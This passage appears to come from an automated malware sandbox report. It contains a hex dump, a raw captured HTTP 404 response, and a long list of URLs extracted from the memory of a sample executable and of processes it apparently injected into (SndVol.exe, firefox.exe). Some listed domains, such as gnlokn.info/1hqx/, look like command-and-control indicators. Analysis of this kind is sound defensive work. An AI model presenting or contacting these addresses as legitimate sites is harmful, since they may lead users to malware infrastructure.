f4 1f ed 74 09 b8 20 46 7d e6 c3 7a 47 70 1f 26 a6 7f ab c6 ef 87 fa d4 f7 5e 96 f6 b7 1c 10 a0 6e cf d7 c7 dc f6 25 3e 5a 59 ec bc 9d a2 97 e3 f5 29 7f 94 41 9b 15 ce bd 05 30 12 81 18 d5 ff b9 37 e3 f8 3d 81 5f 3a 15 08 ea 00 dc 03 20 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkeddate: Mon, 10 Mar 2025 11:32:28 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 32 37 38 31 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 
3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20
                Source: SndVol.exe, 00000010.00000002.3513023367.0000000006C78000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.0000000004258000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
                Source: svchost.exe, 00000007.00000002.2868897234.0000023C078D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ver)
                Source: qmgr.db.7.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                Source: qmgr.db.7.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                Source: qmgr.db.7.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                Source: qmgr.db.7.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                Source: qmgr.db.7.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                Source: qmgr.db.7.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                Source: edb.log.7.dr String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                Source: ungziped_file.exe, 00000000.00000002.1078729366.0000000002BD8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.5lzhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.77zhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.9xiuzhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.aguardiente.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.aihuzhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.americanstar.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.antuzhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.automester.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.autp.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.babygirlnames.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.babyzhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.beautifullady.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=248421974679
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.beibizhibo.com
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.bitza.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.bolezhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.caobizhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.careerservice.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chuyuzhibo.net/binding
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.companybuilder.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.cyberpolice.cn
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dajingzhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.douquzhibo.com
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.douquzhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.douzhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.duniangzhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dynaform.net
                Source: firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.eduexpo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ellanse.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.eroticstore.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.eventmagic.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.firstdial.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.firstmusic.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.genesisenergy.net/binding
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.globalreview.net
                Source: K1A8707LwM6.exe, 00000011.00000002.3514314819.0000000005368000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.gnlokn.info
                Source: K1A8707LwM6.exe, 00000011.00000002.3514314819.0000000005368000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.gnlokn.info/1hqx/
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.gstec.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.hackpack.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.haicaozhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.hedco.net/binding
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jindouzhibo.net
                Source: firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jutuzhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lamachine.net
                Source: firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lanyunzhibo.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.legalvideos.net
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lemed.net
                Source: firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/15wz/
                Source: SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/css/appsdetail.6f4104a5611f3a6cc38f23add
                Source: SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/css/pcmodule.edd4638c5c3b3039832390269d4
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/adblock.fe363a40.js
                Source: SndVol.exe, 00000010.00000002.3515060354.00000000081E0000.00000004.00000800.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/aggregatedentry.fe363a40.js
                Source: firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/appsdetail.fe363a40.js
                Source: SndVol.exe, 00000010.00000002.3513023367.0000000005CC4000.00000004.10000000.00040000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3512383533.00000000032A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1697685561.000000000B884000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lianlianzhibo.net/template/news/wandoujia/static/js/bl.js
